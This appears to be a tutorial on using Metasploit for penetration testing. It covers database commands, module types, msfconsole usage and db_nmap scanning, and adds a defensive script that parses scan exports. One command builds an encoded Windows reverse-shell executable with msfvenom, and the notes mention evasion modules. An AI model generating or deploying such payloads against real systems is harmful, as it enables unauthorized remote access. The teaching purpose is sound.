Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Setting up database

The database in metasploit is used to store output. Postgres comes pre-installed on Kali. The commands for the database are:

  • msfdb init - Start and initialize the database

  • msfdb reinit - Delete and reinitialize the database

  • msfdb delete - Delete database and stop using it

  • msfdb start - Start the database

  • msfdb stop - Stop the database

  • msfdb status - Check service status

  • msfdb run - Start the database and run msfconsole

For now, to start the database we want to reinit so all data is deleted and the database is restarted:

kali@kali:~$ msfdb reinit

Afterwards, run msfconsole so we can check the status of the database:

msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > 
# Good to go

Modules

Metasploit comes with many modules pre-installed. The modules are categorized under:

  • Auxiliary - Contains alternate exploits and enumeration scripts

  • Encoders - Contains encoders that assist in encoding payloads

  • Evasion - Contains scripts that help evade defender software

  • Exploits - Organized into folders based on device then exploit.

  • NOPs - No-operation instructions, used as padding in payloads

  • Payloads - Categorized into Singles, Stagers, and Stages

  • Post - Post exploitation modules

MSF Venom

MSFVenom is a Metasploit standalone payload generator. You can use MSFVenom on its own to specify a framework, encoder, executable format, etc. to be used.

To generate a payload with the msfvenom command:

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -a x86 -b "\x00" -e x86/shikata_ga_nai -f exe > payload.exe

Let's break down what's going on in the command:

  • msfvenom: Calling the msfvenom generator

  • -p windows/shell_reverse_tcp: The P is the payload flag, and the string is the payload name

  • LHOST: The host IP that the reverse shell connects back to (the listener).

  • LPORT: The port on that host that the reverse shell connects back to. Default is 4444.

  • -a x86: Architecture specification.

  • -f exe: Format of the payload. In this case a .exe executable.

  • -b "\x00": Bad characters to avoid; here the null byte is excluded from the encoded payload.

  • -e x86/shikata_ga_nai: The encoder.

  • > payload.exe: The output file name for the payload.

Encoders

The encoder can be run multiple times on the same payload using the -i <iterations> option. For example, -i 3 runs the payload through 3 iterations of the encoder, increasing its size but also its encoding strength.

MSFCONSOLE

Searching

You can use the extensive search queries in msfconsole to find whatever you're looking for. The search command looks like search <string> type:exploit.

Use

When you find a program you'd like to utilize, you can run the use command to load the program: use <program name>.

While inside an exploit you can use the show options command to determine what configuration needs to be set up.

Set

While an exploit is loaded you can use the set <option> <value> command to set the configuration options.

Unset

The reverse of set. To unload a configured option use the unset <option> command.

Run

To run the exploit use the run command.

Sessions

Use the sessions -l command to view any active sessions.

Back

To back out of using an exploit type the back command to be brought back to the menu.

Port Scanning

Port scanning through msfconsole is very similar to running the nmap tool.

msf5 > db_nmap -v -n -Pn -sV 192.0.0.1

The difference is the results are stored in the database and commands can be run to retrieve specific results.

msf5 > hosts # To view all hosts
msf5 > services # To view active services
msf5 > db_export -f xml scan.xml # To export the results
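As an added example that is not part of the original notes, the Python script below reads a db_export -f xml file, lists each host's open services, and flags any that are not on an approved allowlist, which is how a defender would use the stored scan data. The element names (host, address, services/service with port, proto, state, name, info) are assumed to follow the Metasploit XML export layout; the sample document is constructed.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample in the layout of a Metasploit `db_export -f xml` file
# (element names assumed; compare against a real export before relying on them).
SAMPLE_EXPORT = """<MetasploitV5>
  <hosts>
    <host>
      <address>192.0.2.10</address>
      <services>
        <service><port>22</port><proto>tcp</proto><state>open</state><name>ssh</name><info>OpenSSH 8.2</info></service>
        <service><port>80</port><proto>tcp</proto><state>open</state><name>http</name><info>nginx</info></service>
        <service><port>23</port><proto>tcp</proto><state>closed</state><name>telnet</name><info></info></service>
      </services>
    </host>
    <host>
      <address>192.0.2.11</address>
      <services>
        <service><port>5432</port><proto>tcp</proto><state>open</state><name>postgresql</name><info>PostgreSQL 12</info></service>
      </services>
    </host>
  </hosts>
</MetasploitV5>
"""

def open_services(xml_text):
    """Return {address: [(port, proto, name, info), ...]} for services in state 'open'."""
    root = ET.fromstring(xml_text)
    result = defaultdict(list)
    for host in root.iter("host"):
        addr = (host.findtext("address") or "").strip()
        if not addr:
            continue  # skip malformed host records
        for svc in host.iter("service"):
            text = lambda tag: (svc.findtext(tag) or "").strip()
            if text("state") != "open":
                continue  # closed/filtered ports are not exposure
            result[addr].append((int(text("port")), text("proto"), text("name"), text("info")))
        result[addr].sort()  # hosts with no open services still appear, with an empty list
    return dict(result)

def unexpected_services(services, allowlist):
    """Flag open services whose (address, port, proto) is not in the approved allowlist."""
    return sorted((addr, port, proto, name)
                  for addr, svcs in services.items()
                  for port, proto, name, _ in svcs
                  if (addr, port, proto) not in allowlist)
```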

You can find alternative port scanners for specific scans by running search portscan.
